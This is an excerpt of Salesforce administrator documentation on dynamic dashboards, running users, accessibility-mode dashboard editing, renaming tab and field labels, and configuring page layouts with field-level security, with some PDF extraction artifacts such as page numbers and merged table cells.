Select a color to represent the high range, beyond the second breakpoint.High Range Color

See Also:
Visual Settings for Dashboard Chart Components
Modify a Dashboard Component

Provide Individualized Views of a Dashboard
Dynamic dashboards enable each user to see the data they have access to. With a dynamic dashboard, you can control data
visibility without having to create a separate dashboard, with its own running user and folder, for each level of data access.

Available in: Enterprise, Unlimited, and Developer Editions

Administrators control access to dashboards by storing them in folders with certain visibility settings. Dashboard folders can
be public, hidden, or restricted to groups, roles, or territories. If you have access to a folder, you can view its dashboards.

Folders control access to the dashboard, but the running user determines access to data. The running user options are:

• Run as specified user. The dashboard runs using the security settings of that single, specific user. All users with access to
the dashboard see the same data, regardless of their own personal security settings. This approach is perfect for sharing
the big picture across a hierarchy, or motivating team members by showing peer performance within a team. If you don’t
have “View All Data,” you can only choose yourself. If you have “View My Team's Dashboards,” you can choose any user
below you in the role hierarchy.

2793

Share Insights with DashboardsShare Insights



• Run as logged-in user. A dynamic dashboard runs using the security settings of the user viewing the dashboard. Each user
sees the dashboard according to his or her own access level. This approach helps administrators share one common set of
dashboard components to users with different levels of access.

With a dynamic dashboard, you can control data visibility without having to create a separate dashboard, with its own running
user and folder, for each level of data access. A single dynamic dashboard can display a standard set of metrics across all levels
of your organization.

You can create up to three filters for each dynamic dashboard. Filtering dynamic dashboards gives administrators additional
flexibility in creating dashboards. For example, you can create an organization-wide sales scorecard that contains sales rep and
product filters. This allows individual sales managers to view their reps’ performance collectively as well as individually. It also
lets them view sales by product to understand which products specific reps are or aren’t selling.

Managers with the “View My Team's Dashboards” or “View All Data” permission can set an option to preview the dashboard
from the point of view of users under them in the role hierarchy.

Your organization can have up to five dynamic dashboards for Enterprise Edition, 10 for Unlimited Edition, and three for
Developer Edition.Additional dynamic dashboards may be available for purchase.

Note:

• Following components isn't supported for dynamic dashboards.

• You can't save dynamic dashboards to personal folders.

• You can't schedule refreshes for dynamic dashboards. They must be refreshed manually.

Example Business Scenario

Let's say that your opportunity team consists of one vice president, four sales managers, and 40 sales reps—10 reps per manager.
You've been asked to create dashboards that display the following metrics, restricted by role and hierarchy:

Number of Activities by
Meeting Type

Close Rates by CompetitorTotal BookingsRole

Sales Rep

Sales Manager

VP of Sales

Sales reps should only see their own data; managers should only see data for the reps they manage; and the VP should see data
across the entire team. In this scenario, you'd typically have to create 45 different dashboards—one for every single person.
You'd also have to create multiple folders to manage access rights.

With dynamic dashboards, you can create just two dashboards and store them in a single folder:

• Create a dynamic dashboard for sales reps with the following components:

◊ A gauge of total bookings
◊ A table of activities by meeting type

• Create a dynamic dashboard for managers and the VP with the following components:

◊ A gauge of total bookings
◊ A column chart of close rates by competitor
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• Optionally, create filters that let viewers further refine their dashboard views. For example, create a filter on key accounts
to let viewers focus on bookings, activities, and competitive threats for each account.

All users only see data that they can access. Sales reps see their own bookings and activities. Managers see bookings and close
rates for the reps they manage. The VP sees bookings and close rates for the whole team. Because the metrics are the same
for managers and the VP, you can use the same dynamic dashboard for both roles. The dynamic dashboards feature reduces
the number of required dashboards from 45 to two!

See Also:
Share Insights with Dashboards
Set Up Dynamic Dashboards
Filter Dashboard Data
Create a Dashboard
Set Up Dynamic Dashboards

Set Up Dynamic Dashboards
To set up a dynamic dashboard, create a folder to hold the dashboard and its underlying reports, then create the dashboard.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND “Manage Dynamic Dashboards”To create, edit, and delete dynamic dashboards:

“View My Team's Dashboards” OR “View All Data”To enable choosing a different running user for the dashboard:

Your organization can have up to five dynamic dashboards for Enterprise Edition, 10 for Unlimited Edition, and three for
Developer Edition.

Note:

• You can't save dynamic dashboards to personal folders.
• You can't schedule refreshes for dynamic dashboards. They must be refreshed manually.

1. Create folders accessible to all dashboard viewers to store dynamic dashboards and corresponding component source reports.
2. From the Dashboards tab, create a new dashboard or edit an existing one.

3. Click the  button next to the View dashboard as field.

Note:  If you don’t have “Manage Dynamic Dashboards” permission, just enter a running user and skip to the
final step. Enter “*” to see all available users.

4. Select Run as logged-in user.
5. Optionally, select Let authorized users change running user to enable those with permission to change the

running user on the dashboard view page.

• Users with “View My Team's Dashboards” can view the dashboard as any user below them in the role hierarchy.
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• Users with “View All Data” can view the dashboard as any user in their organization.

6. Click OK.
7. In the View dashboard as field, enter a running user.
8. Save your dashboard.
9. Set the appropriate Show option on the report run page.

For example, if you choose “My Team's Opportunities,” each dynamic dashboard viewer can see all opportunities for the
team.

Tip:  To avoid restricting the dashboard's view of the data:

• Make sure advanced filters don't include specific record owners (for example, Opportunity Owner equals
Frank Smith).

• Don't click Save Hierarchy Level when saving opportunity reports.

See Also:
Provide Individualized Views of a Dashboard
Add a Dashboard Filter
Provide Individualized Views of a Dashboard
Choose a Dashboard Running User

Let Users View Dashboards on the iPad
The Mobile Dashboards for iPad app is automatically enabled for your organization so your users can access the app without
any configuration on your part.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view Mobile Dashboards for iPad settings:

“Customize Application”To modify Mobile Dashboards for iPad settings:

You can disable the app if you don’t want users accessing Salesforce data from mobile devices and you can easily re-enable it
if you change your mind later.

To configure access to Mobile Dashboards for iPad:

1. From Setup, click Mobile Administration  > Mobile Dashboards  > Settings.
2. Select or deselect Enable the Mobile Dashboards iPad app for all users.
3. Click Save.

Users can download and install the Mobile Dashboards for iPad app from the Apple App Store or AppExchange Mobile.
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Aside from editions noted, the app is available to organizations enabled with REST API.

See Also:
Share Insights with Dashboards

Edit Dashboards in Accessibility Mode

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND access to dashboard folderTo view and refresh dashboards:

“Run Reports” AND “Manage Dashboards”To create dashboards:

“Run Reports” AND “Manage Dashboards”To edit and delete dashboards you created:

“Run Reports,” “Manage Dashboards,” AND “View All Data”To edit and delete dashboards you didn’t create:

“Run Reports” AND “Manage Dynamic Dashboards”To create, edit, and delete dynamic dashboards:

Important:  This topic applies only if you're not using the dashboard builder. Dashboard builder is a drag-and-drop
interface for creating and modifying dashboards.

A dashboard shows data from source reports as visual components, which can be charts, gauges, tables, metrics, or Visualforce
pages. To customize a dashboard, view it and click Edit.

From the Dashboard Edit page, you can:

• See the running user for the dashboard in the Displaying data as field.

• Click Dashboard Properties to change the title, folder, running user, and more.

• Click Done to view the dashboard. All changes you make to the dashboard are saved as you make them.

• Click the Delete button to delete the entire dashboard.

• Click Add Component in any column.

• Click Narrow, Medium, or Wide to set a column's width.

Note:  If your component is a pie or donut chart with Show Values or Show Percentages enabled and
Legend Position set to Right, the dashboard column width must be Wide for values and percentages to show
on the dashboard.

• Click , , , and  to rearrange components in the dashboard.
• Click Edit to modify component properties like the component type, display units, source report, and more.

• Click Delete to remove a component from the dashboard. Deleted components don't get stored in the Recycle Bin.
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• Click a dashboard component or its elements to drill down to the source report, filtered report, record detail page, or other
URL. If you drill down on a filtered component, the dashboard filters are applied to the source report.

See Also:
Share Insights with Dashboards
Set Dashboard Properties in Accessibility Mode
Adding and Editing Dashboard Components in Accessibility Mode
Dashboard Component Properties in Accessibility Mode
Adding and Editing Dashboard Components in Accessibility Mode
Create a Dashboard
Set Dashboard Properties in Accessibility Mode

Set Dashboard Properties in Accessibility Mode

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND “Manage Dashboards”To create dashboards:

“Run Reports” AND “Manage Dynamic Dashboards”To create, edit, and delete dynamic dashboards:

“View My Team's Dashboards” OR “View All Data”To enable choosing a different running user for the dashboard:

Important:  This topic applies only if you're not using the dashboard builder. Dashboard builder is a drag-and-drop
interface for creating and modifying dashboards.

To set dashboard properties:

1. Edit a dashboard and click Dashboard Properties.
2. Do the following:

• Enter a title and description for the dashboard.
• If you have the “Customize Application” permission, enter a unique name to be used by the API and managed packages.
• Select the number of columns for this dashboard. Each dashboard can have two or three columns.

Important:  Before removing a column, move its components to another column; otherwise, they may not be
visible.

• Select a folder to store the dashboard. The folder should be accessible by all of your intended viewers.
• Choose the Dashboard Running User to set visibility settings for the dashboard:

◊ Select Run as specified user and set the Running User field to show all dashboard users the same data,
regardless of their personal security settings. If you don’t have “View All Data,” you can only choose yourself.

◊ Select Run as logged-in user to show data to each user according to his or her access level.
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- Set the View Edit Page as field to preview the dashboard edit page from the point of view of the selected
user.

- If you have the “View My Team's Dashboards” or “View All Data” permission, select Let authorized users
change running user to enable those with permission to change the running user on the dashboard edit
page. Users with “View My Team's Dashboards” can view the dashboard as any user below them in the role
hierarchy. Users with “View All Data” can view the dashboard as any user in their organization.

• Under Component Settings, select the title color and size, text color, and background fade. If you don't want a gradient,
choose the same color for both Starting Color and Ending Color.

3. Click Save.

See Also:
Edit Dashboards in Accessibility Mode
Set Up Dynamic Dashboards
Choose a Dashboard Running User

Adding and Editing Dashboard Components in Accessibility Mode

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports” AND “Manage Dashboards”To create dashboards:

“Run Reports” AND “Manage Dashboards”To edit and delete dashboards you created:

“Run Reports,” “Manage Dashboards,” AND “View All Data”To edit and delete dashboards you didn’t create:

Important:  This topic applies only if you're not using the dashboard builder. Dashboard builder is a drag-and-drop
interface for creating and modifying dashboards.

A dashboard shows data from source reports as visual components, which can be charts, gauges, tables, metrics, or Visualforce
pages. The components provide a snapshot of key metrics and performance indicators for your organization. Each dashboard
can have up to 20 components.

To add a dashboard component:

1. Edit a dashboard.
2. Click Add Component from the top of any column and define component properties.
3. Choose the Custom Report to use for your dashboard. If you chose the Visualforce Page, or Custom S-Control

component, select a page or s-control and enter the display height. You can show a joined report that includes a chart on
a dashboard. Edit the joined report dashboard component and select Use chart as defined in the source report.
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Note:

• Custom forecast and lead reports that you created using a standard report may not be available in the Custom
Report list.

• To use a tabular report on a dashboard, first limit the row count, by setting the Rows to Display option,
the sort column, and the order on the Select Criteria page of the report. You can't use gauge or metric
components on dashboards using tabular reports.

4. Enter the appropriate settings for the component type you selected:Choose settings on the Formatting tab for the component
type you selected:

• Formatting Settings for Dashboard Bar Chart Components
• Formatting Settings for Dashboard Scatter Chart Components
• Formatting Settings for Dashboard Gauge Components
• Formatting Settings for Dashboard Metric Components
• Formatting Settings for Dashboard Table Components

5. Click Save.

Note: Metric components placed directly above and below each other in a dashboard column are displayed together
as a single component.

See Also:
Edit Dashboards in Accessibility Mode
Chart Types
Modify a Dashboard Component

Dashboard Component Properties in Accessibility Mode

Important:  This topic applies only if you're not using the dashboard builder. Dashboard builder is a drag-and-drop
interface for creating and modifying dashboards.

The following settings may vary according to the component type you select.

DescriptionField

Select vertical or horizontal bar chart, line chart, pie or donut chart, table, metric, gauge,
Visualforce page, or custom s-control.

Component Type

Enter text to display at the top of the dashboard component.Header

Enter text to display at the bottom of the dashboard component.Footer

Enter a title to identify the dashboard component.Title

Choose a scale for displaying your chart values. For table components, this setting applies
only to the first column. For best results, choose Auto to let Salesforce select appropriate
units.

Display Units
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DescriptionField

Select what happens when users click a dashboard component:Drill Down to

• Source Report—Takes the user to the full source report for the dashboard component.

• Filtered Source Report—When users click individual groups, X-axis values, or legend
entries, they are taken to the source report filtered by what they clicked.

For example, if you had a stacked vertical column chart of opportunities grouped by
stage, with months as the X-axis, you could click an individual stage in a bar, a month
on the X-axis, or a legend entry for a stage to drill down to the filtered source report.
(Not available for gauges, metrics, or tables.)

• Record Detail Page—When users click chart or table elements, axis values, or legend
entries, they are taken to the detail page for that record. You can only choose this
option for tables and charts that use a source report grouped by record name, record
owner, or feed post. (Not available for gauges or metrics.)

• Other URL—Takes the user to the URL that you specify. You can't add URLs that
begin with “mailto:” or “javascript:” to dashboard components.

Note:  Filtered and record detail page drill-down are disabled for dashboard
charts with more than 200 values.

Specify the URL that users go to when they click the dashboard component. Use this
option to send users to another dashboard, report, record detail page, or other system
that uses a Web interface.

Drill Down URL

See Also:
Edit Dashboards in Accessibility Mode
Modify a Dashboard Component
Dashboard Component Types

Why doesn't my dashboard display the data I expect?
If you’re not seeing data you expect, refresh for latest data, check that you have the right running user, and verify whether data
sources on the dashboard are correct.

If your dashboard data doesn't look as you expect, check the following:

• Running user. Remember that you're viewing the dashboard from the perspective of the running user. What you see is
based on that user's access rights. For dynamic dashboards, you can only see what you yourself can access.

• Last dashboard refresh. You may be viewing older data. Click Refresh to refresh your dashboard.
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• Data sources. Verify that your data sources (reports, s-controls, or Visualforce pages) contain the information you want
displayed in the dashboard components.

See Also:
Share Insights with Dashboards

2802

Share Insights with DashboardsShare Insights



Welcome, Salesforce Point & Click Administrators
Ready to go beyond the basics of Salesforce administration? Want to customize your organization, push its boundaries, and
enhance its functionality? You can do that and so much more without writing a single line of code. All you need is your mouse
and a sense of adventure. Put on your fedora, it’s time to explore!

Inside you’ll find a multitude of features you can use to expand your organization. Enhance your objects, data, and fields,
customize your organization’s look and feel, augment your business processes, create websites, and even create apps—all using
point-and-click tools.

CUSTOMIZING YOUR ORGANIZATION

Using the Force.com Quick Access Menu
The Force.com quick access menu offers handy shortcuts to customization features.

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To view the Force.com quick access menu:

When you're working on apps or objects, use this menu to jump to relevant app customization features. It's available from
object list view pages and record detail pages.

Note:  The Force.com quick access menu isn't visible for list views on accounts, contacts and custom objects if
drag-and-drop scheduling on list views is enabled.

• To expand or collapse the menu, click  (or press ALT+;).
• To scroll down the list of the menu, press TAB.

• To select an option on the menu, press ENTER.

• To remove the menu from all list views and record pages, click Turn off menu.

• To restore the menu, go to your personal information page, click Edit, select the Force.com Quick Access Menu checkbox,
then click Save.

ENHANCE SALESFORCE WITH POINT
AND CLICK TOOLS

2803



CHANGING HOW SALESFORCE LOOKS

Renaming Tab and Field Labels
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

OR

“View Setup and Configuration”

AND

Be designated as a translator

To rename tab and field labels:

“Customize Application”

OR

“View Setup and Configuration”

AND

Be designated as a translator

To reset renamed tabs:

You can change the display labels of tabs, objects, fields, and other related user interface labels so they better reflect your
organization's business requirements. When you rename a label, such as changing the “Accounts” label to “Companies,” the
new label appears on all user pages, in Connect for Outlook, and in Connect Offline. With rare exception, all pages in the
Setup area use the default, original labels.

Before renaming tabs, objects, fields, and other related labels, review the implementation tips for administrators.

1. From Setup, click Customize > Tab Names and Labels > Rename Tabs and Labels.
2. Select your default language from the Select Language drop-down list at the top of the page.

Note: In Hebrew, we recommend keeping tab renaming to a minimum because variable gender in verbs is not
supported and verbs can lose gender agreement.

3. Click Edit next to the tab you want to rename. Optionally, click Reset to change the name of your renamed tab to its
original name.

Note:  You cannot reset custom object tab names.
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4. Enter the singular and plural forms of the new tab label. Also, if applicable for the language, select the Starts with a
vowel sound checkbox for labels that start with a vowel. This ensures that the proper article (such as “a” or “an”) is used.
Then click Next.

A renamed tab or object cannot use the name of another standard tab, custom object, or custom tab.

5. Enter the standard field labels and other user interface labels to be used for the selected tab or object. Be sure to enter both
a singular and plural form for each label that requires it. Also, select the Starts with a vowel sound checkbox for
labels that start with a vowel.

If your organization uses person accounts, see Renaming Person Account Labels on page 2805.

Note: Some standard fields, such as Created By and Last Modified By, are purposely omitted from renaming
because they track system information.

6. Click Save.
7. Repeat this procedure to translate labels into all other languages used in your organization.

Tip:  After renaming a tab or object, rename any custom reports, dashboards, profiles, permission sets, custom fields,
and list views that contain the original name. You can modify labels using the Translation Workbench. To rename
a standard report, click Save As and save it to a folder designed for your new name.

Other tab customization options include the following:

• Individual users can control which tabs and related lists display for their own logins.

• In addition to the standard tabs provided by Salesforce, users can create entirely new custom tabs depending on their
Edition. For more information, see Defining Custom Tabs on page 2837.

• In Enterprise, Unlimited, and Developer Edition organizations, you can override the tab home page that is displayed when
a user clicks a standard or custom object tab. For more information, see Overriding Standard Buttons and Tab Home
Pages on page 3501.

Renaming Person Account Labels

Person accounts available in: Enterprise, Unlimited, and Developer Editions

If your organization uses person accounts, you can rename the following standard field labels:

DescriptionTabField

An account that is not a person account because it does not
have a record type specific to person accounts. This label is

AccountsBusiness Account

primarily used to clarify the type of accounts you are
importing.

A person account. For more information, see below.AccountsPerson Account

A contact that is associated with a business account. This label
is primarily used to clarify the type of accounts you are
importing.

ContactsBusiness Contact

When you rename the Person Account field label, the renamed label appears in Salesforce as follows:
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• As a prefix to differentiate person account fields such as Birthdate and Home Phone from business account fields. For
example, Person Account: Birthdate is available as an account column in opportunity reports.

• In the name of the Is Person Account field and icon. For example, if you rename the Person Account field to
“Consumer,” then Is Person Account becomes Is Consumer.

Note:  The Person Account and Business Account field labels are completely independent from actual record
type names. To customize person account record types, from Setup, click Customize > Accounts > Person Accounts
> Record Types. To customize business account record types, from Setup, click Customize > Accounts > Record
Types.

See Also:
Considerations for Renaming Tab and Field Labels
Renaming the Chatter Tab

Considerations for Renaming Tab and Field Labels

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To rename tab and field labels:

“Customize Application”To reset renamed tabs:

Renaming standard and custom Salesforce tabs, objects, fields, and other related user interface labels is a valuable feature that
has far-reaching implications for all your users. Before renaming anything for your organization, review the following
considerations to determine how it will affect your users:

• Most standard tabs and objects can be renamed but not all. For example, the Forecasts tab is not available for renaming.
From Setup, click Customize  > Tab Names and Labels > Rename Tabs and Labels to view a list of the tabs and objects
you can rename.

• The renamed labels display on all user pages in Salesforce including Personal Setup. However, all pages in the Setup area
use the default, original labels.

• Some standard fields, such as Created By and Last Modified By, are purposely omitted from renaming because they
track system information.

• After renaming tabs, objects, or fields, check the following additional items that may need manual updates:

◊ Review all list view names. List view names continue to display the original object name until you change them manually.

◊ Check standard report names and descriptions for the objects you renamed.

◊ Update the titles and descriptions of any email templates that contain the original object or field name.

◊ Manually change any other items you customized with the standard object or field name. For example, custom fields,
page layouts, and record types may contain the original tab or field name.

• Connect Offline, Connect for Lotus Notes, Connect for Outlook, and Salesforce for Outlook use your new names.
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• If you have renamed tabs, objects, or fields, you can also replace the Salesforce online help with another URL. Users can
view this URL whenever they click on any context-sensitive help link on an end-user page or within their personal settings.
After you replace the help, the Help & Training link at the very top of every page and all Setup pages will continue to
display Salesforce online help. For instructions on replacing the online help, see Replacing Salesforce Online Help on page
2845.

• In Hebrew, we recommend keeping tab renaming to a minimum because variable gender in verbs is not supported and
verbs can lose gender agreement.

See Also:
Renaming Tab and Field Labels

CUSTOMIZING YOUR PAGES

Overview of Page Layouts and Field-Level Security
Page layouts and search layouts available in: All Editions

Field-level security available in: Enterprise, Unlimited, Developer, and Database.com Editions

Use field-level security to control the access that users have to certain fields. Additionally, use page layouts to control the layout
and organization of detail and edit pages in Salesforce, the Self-Service Portal, and the Salesforce Customer Portal. Customize
search layouts to change which fields display in search results and the buttons that display on list views.

Important: While you can use page layouts to hide fields from detail and edit pages, be aware that users may still be
able to access those fields by other means, including reports, search results, list views, and the API. Use field-level
security to restrict all means of accessing a field. Field-level security doesn’t prevent searching on the values in a field.
When search terms match on field values protected by field-level security, the associated records are returned in the
search results without the protected fields and their values.

Field-Level Security

• Restrict users’ access to view and edit fields by any means, including reports, search results, list views, related lists, email
and mail merge templates, custom links, Connect Offline, the API, and when synchronizing data or importing personal
data.

• Override any less-restrictive field access settings in page layouts and mini page layouts.

For example, if a field is required in the page layout and read only in the field-level security settings, the field-level security
overrides the page layout and the field will be read only for the user.

• Override less-restrictive field settings in search layouts.

For example, if a field is visible in the search layout but hidden for certain users via the field-level security settings, the
field-level security overrides the search layout and the field will be hidden for those users.
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Page Layouts

• Control the layout and organization of detail and edit pages.
• Control which fields, related lists, and custom links users see, on detail and edit pages only.
• Control which standard and custom buttons display on detail pages and related lists.
• Determine whether fields are visible, read only, or required, on detail and edit pages only.
• In Personal, Contact Manager, Group, and Professional Editions, control which fields users can access in related lists, list

views, reports, Connect Offline, email and mail merge templates, custom links, and when synchronizing data or importing
personal data.

• In Professional, Enterprise, Unlimited, and Developer Editions, determine some aspects of mini page layouts, including
record type and profile associations, related lists, fields, and field access settings. The visible fields and related lists of the
mini page layout can be further customized, but the other items inherited from the associated page layout cannot be changed
on the mini page layout itself. Mini page layouts display selected fields and related lists of records in the mini view of the
console.

• Should not be used to secure data. For example, removing the Edit button from a page layout doesn’t prevent users from
using inline editing to modify records. To prevent users from editing data, use any combination of sharing rules, field-level
security, page layout field properties, validation rules, object permissions, and Visualforce pages.

Note:  To automatically add a field to all page layouts and make it visible and required everywhere regardless of
field-level security, make it a universally required field.

See Also:
Managing Page Layouts

Creating Page Layouts
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create page layouts:

1. From Setup, click Customize, select an object or record type, and click Page Layouts.

For opportunities, from Setup, click Customize  > Opportunities > Opportunity Products > Page Layouts to create or
edit the additional page layouts for products on opportunities.

For person accounts, from Setup, click Customize  > Accounts > Person Accounts > Page Layouts to create or edit the
additional page layouts for person accounts.

For campaign members, from Setup, click Customize > Campaigns > Campaign Member > Page Layouts.

2. Click New.
3. Optionally, choose an existing page layout to clone.
4. Type a name for the new layout.
5. Click Save.
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6. Modify the layout.
7. Assign the new layout to user profiles.

Tip:  You can create a new page layout by cloning an existing one.

• In the enhanced page layout editor, click Edit  next to a layout, then click Save As on the layout page.

• In the original page layout editor, select a layout, then click Clone on the layout page.

See Also:
Managing Page Layouts
Overview of Page Layouts and Field-Level Security

Managing Page Layouts
Available in: All Editions

User Permissions Needed

“Customize Application”To create, edit, and delete page layouts:

You can customize the page layouts for record detail and edit pages, Self-Service portal pages, Salesforce Customer Portal
pages, and the case close page. Page layouts control the layout and organization of buttons, fields, s-controls, Visualforce,
custom links, and related lists. They also help determine which fields are visible, read only, and required. Page layouts can
include s-controls and Visualforce pages that are rendered within a field section when the page displays. You can control the
size of the s-controls and Visualforce pages, and determine whether or not a label and scroll bars display.

To work with page layouts, from Setup, click Customize, click the appropriate record type, and select Page Layouts. You
can:

• Click New to create layouts.

• Click Edit to modify layouts or customize related lists.

• Click Del to delete layouts.

• Click Page Layout Assignment to assign page layouts to profiles and record type.

For Personal, Contact Manager, Group, and Professional Edition organizations, every user views the same layout. Enterprise,
Unlimited, and Developer Edition organizations can create different page layouts for use by different profiles and record types
and set field-level security settings to further restrict users’ access to specific fields.

In Professional, Enterprise, Unlimited, and Developer Editions, you can set the mini page layouts and related objects that
appear in the Console tab.

Tip: Use field-level security as the means to restrict users’ access to fields; then use page layouts primarily to organize
detail and edit pages within tabs. This reduces the number of page layouts for you to maintain. Note that field-level
security settings override the visible and read-only settings on the page layout if the field-level security has a more
restrictive setting than the page layout.
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Note: A background process periodically runs that cleans up metadata associated with deleted custom fields. This
process will affect the Last Modified Date and Last Modified By fields on page layouts, record types, and
custom objects.

See Also:
Overview of Page Layouts and Field-Level Security
Accessing the Page Layout Editor for Standard Objects
Accessing the Page Layout Editor for Custom Objects
Administrator tip sheet: Tips & Hints for Page Layouts and Field-Level Security

Setting Page Layouts and Field-Level Security

Page layouts and search layouts available in: All Editions

Field-level security available in: Enterprise, Unlimited, and Developer Editions

Use field-level security as the means to restrict users’ access to fields; then use page layouts primarily to organize detail and
edit pages within tabs. This reduces the number of page layouts for you to maintain.

Note: Field-level security doesn’t prevent searching on the values in a field. When search terms match on field values
protected by field-level security, the associated records are returned in the search results without the protected fields
and their values.

For Personal, Contact Manager, Group, and Professional Editions

1. Create custom fields.
2. Create any custom buttons or links.
3. Create any custom s-controls.
4. Define page layouts. All users automatically use the same page layout for each tab.
5. Set the related objects and the mini page layouts that display in the console.
6. Define search layouts. All users use the same search layouts.

For Enterprise, Unlimited, and Developer Editions

1. Create custom fields.
2. Create any custom buttons or links.
3. Create any custom s-controls.
4. Create any custom profiles.
5. Create record types for different business scenarios.
6. Assign which record types are available to users with different profiles.
7. Set the field-level security for each profile to restrict users’ access to specific fields.
8. Define page layouts to organize your pages.
9. Set the related objects and the mini page layouts that display in the console.
10. Assign page layouts to users based on profiles and record types.
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11. Check the field accessibility grid to verify that all field access settings are correct.
12. Define search layouts. All users use the same search layouts.

See Also:
Administrator tip sheet: Tips & Hints for Page Layouts and Field-Level Security

Assigning Page Layouts

Available in: Enterprise, Unlimited, and Developer Editions

After defining page layouts, assign which page layouts users see. A user’s profile determines which page layout he or she sees.
In addition, if your organization is using record types for a particular tab, the combination of the user’s profile and the record
type determine which page layout is displayed.

You can assign page layouts from:

• The object's customize page layout or record type page

• The enhanced profile user interface.

• The original profile user interface

To verify that users have the correct access to fields based on the page layout and field-level security, you can check the field
accessibility grid.

See Also:
Managing Page Layouts
Record Types Overview
Overview of Page Layouts and Field-Level Security

Assigning Page Layouts from a Customize Page Layout or Record Type
Page

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To assign page layouts:

1. From Setup, click Customize, select the appropriate activity or tab link, and choose Page Layouts or Record Types..
2. In the page layout or record type list page, click Page Layout Assignment.
3. Click Edit Assignment.
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4. Use the table to specify the page layout for each profile. The table displays the page layout assignments for each profile. If
your organization uses record types, a matrix displays a page layout selector for each profile and record type.

When selecting page layout assignments:

• Click a cell, column, or row heading to select all the table cells in that column or row.
• Press SHIFT+click to select multiple adjacent table cells, columns, or rows.
• Press CTRL+click to select multiple nonadjacent table cells, columns, or rows.
• Click any cell and drag to select a range of cells.
• Click Next or Prev to view another set of record types.

Selected page layout assignments are highlighted. Page layout assignments you change are italicized until you save your
changes.

5. If necessary, select another page layout to assign from the Page Layout To Use drop-down list and repeat the previous
step for the new page layout.

6. Click Save.

See Also:
Assigning Page Layouts

Deleting Page Layouts

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To delete page layouts:

To delete a page layout:

1. From Setup, click Customize, select the appropriate activity or tab link, and choose the Page Layouts link.
2. Click Del next to the page layout name.

When a page layout is deleted, its mini page layout is also deleted.

3. Choose another page layout to replace the deleted layout for any profile and record type combinations. Users with those
profiles and record types will see the new page layout.

4. Click Replace.

See Also:
Managing Page Layouts
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Customizing Page Layouts
Available in: All Editions

Salesforce has two drag-and-drop tools for editing page layouts: the original page layout editor and an enhanced page layout
editor. The enhanced page layout editor is enabled by default, and provides all the functionality of the original editor, as well
as additional functionality and an easier-to-use WYSIWYG interface.

You can enable the original page layout editor in the User Interface settings. Your organization can use only one page layout
editor at a time.

• Accessing the Page Layout Editor for Standard Objects

• Accessing the Page Layout Editor for Custom Objects

See Also:
Managing Page Layouts
Overview of Page Layouts and Field-Level Security
Accessing the Page Layout Editor for Standard Objects
Accessing the Page Layout Editor for Custom Objects
Customizing Page Layouts with the Enhanced Page Layout Editor
Customizing Page Layouts with the Original Page Layout Editor

Accessing the Page Layout Editor for Standard Objects
You can edit page layouts of standard objects using the Page Layout Editor.

Available in: All Editions

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

1. From Setup, click Customize.
2. Choose the object.
3. Complete one of the following.

• For Enterprise, Unlimited, and Developer Edition organizations, click Page Layouts, then Edit next to the page layout
you want to customize.

• For all other editions, click Page Layout.
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Note:  If you have the “View Setup” permission only, the Edit button isn’t available. Instead, click the name
of the page layout to view it.

Alternately, if you’re using the Enhanced Page Layout Editor, which is enabled by default, you can customize the page layout
by clicking Edit Layout from the detail page.

See Also:
Managing Page Layouts
Overview of Page Layouts and Field-Level Security
Customizing Page Layouts with the Original Page Layout Editor
Customizing Page Layouts with the Enhanced Page Layout Editor

Accessing the Page Layout Editor for Custom Objects
You can edit page layouts of custom objects using the Page Layout Editor.

Available in: All Editions

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

1. From Setup, clickCreate > Objects.
2. Choose the object.
3. Scroll to the Page Layouts section.
4. Complete one of the following.

a. If you have “Customize Application” permission, click Edit next to the page layout you want to customize.
b. If you have “View Setup” permission, click the page layout .you want to view.

Alternately, if you have “Customize Application” permission, you can customize the page layout by clicking Edit Layout from
the detail page.

See Also:
Managing Page Layouts
Overview of Page Layouts and Field-Level Security
Customizing Page Layouts with the Original Page Layout Editor
Customizing Page Layouts with the Enhanced Page Layout Editor
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Customizing Page Layouts with the Enhanced Page Layout Editor

Available in: All Editions

User Permissions Needed

“Customize Application”To customize page layouts:

“View Setup”To view page layouts:

The enhanced page layout editor is a feature-rich WYSIWYG tool that allows you to customize your organization’s page
layouts for detail and edit pages in Salesforce, the Self-Service Portal, and the Salesforce Customer Portal. The enhanced page
layout editor is enabled by default and provides all of the functionality of the original page layout editor, as well as additional
functionality and an easier-to-use interface.

The enhanced page layout editor has two parts: a palette on the upper portion of the screen and the page layout on the lower
portion of the screen. The palette contains the user interface elements, such as fields, buttons, links, related lists, and any
additional elements that are available for you to add to the page layout.

When working with enhanced page layout editor:

• To add a user interface element to the page layout, select the category to which the element belongs on the left column of
the palette, and drag the element from the palette to the page layout. You can add up to 20 s-controls, 20 Visualforce
pages, and 100 related lists on a page layout. There are no limits on fields and custom links.

• To remove a user interface element from the page layout, drag the element from the page layout to the right side of the
palette, or click the  icon next to the element.

• Use the undo and redo buttons to step backwards and forwards, respectively.

• Use these keyboard shortcuts.

◊ Undo = CTRL+Z

◊ Redo = CTRL+Y

◊ Quick Save = CTRL+S

• To select multiple elements individually, use CTRL+click. To select multiple elements as a group, use SHIFT+click.

• To change the properties of any element on the page layout, double-click the element or click the wrench icon ( ) next
to it. You cannot change the properties of elements in the palette.

• To make a field read-only or required, double-click the field in the page layout and select the Read-Only or Required
checkboxes.

• To gain vertical space when working on moving items around within the page layout, click the arrow beneath the palette
to collapse it.

• To access the other layouts for an object when viewing or customizing an object with multiple page layouts, click the page
layout name at the top of the page and select another layout to view.

• To change the name of the page layout, add personal and public tags if available, and display standard object checkboxes
on the page layout, click Layout Properties.

Note: You can't rename a page layout if you're using Salesforce.com Professional Edition.
